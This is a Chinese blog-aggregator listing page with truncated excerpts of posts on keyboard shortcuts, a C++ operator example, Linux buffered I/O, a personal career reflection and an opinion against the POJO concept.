      判断一个人的编程水平,就看他用键盘多,还是鼠标多。用键盘一是为了输入代码(当然了,也包括注释),再有就是熟练使用快捷键。   曾有人在豆瓣评 《卓有成效的程序员》:“人有多大懒,才有多大闲”。之前我整理了一个 程序员图书列表,目的也就是通过读书,让程序员变懒。  写道 程序员作为特殊的群体,有的人可以这么懒,懒到事情都交给机器去做,而有的人又可
  • c++编程随记 lx.asymmetric C++笔记
     为了字体更好看,改变了格式……   &&运算符:   #include<iostream> using namespace std; int main(){      int a=-1,b=4,k;      k=(++a<0)&&!(b--
  • linux标准IO缓冲机制研究 音频数据 linux
    一、什么是缓存I/O(Buffered I/O)缓存I/O又被称作标准I/O,大多数文件系统默认I/O操作都是缓存I/O。在Linux的缓存I/O机制中,操作系统会将I/O的数据缓存在文件系统的页缓存(page cache)中,也就是说,数据会先被拷贝到操作系统内核的缓冲区中,然后才会从操作系统内核的缓冲区拷贝到应用程序的地址空间。1.缓存I/O有以下优点:A.缓存I/O使用了操作系统内核缓冲区,
  • 随想 生活 暗黑小菠萝 生活
    其实账户之前就申请了,但是决定要自己更新一些东西看也是最近。从毕业到现在已经一年了。没有进步是假的,但是有多大的进步可能只有我自己知道。   毕业的时候班里12个女生,真正最后做到软件开发的只要两个包括我,PS:我不是说测试不好。当时因为考研完全放弃找工作,考研失败,我想这只是我的借口。那个时候才想到为什么大学的时候不能好好的学习技术,增强自己的实战能力,以至于后来找工作比较费劲。我
  • 我认为POJO是一个错误的概念 windshome javaPOJO编程J2EE设计
                  这篇内容其实没有经过太多的深思熟虑,只是个人一时的感觉。从个人风格上来讲,我倾向简单质朴的设计开发理念;从方法论上,我更加倾向自顶向下的设计;从做事情的目标上来看,我追求质量优先,更愿意使用较为保守和稳妥的理念和方法。    &
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他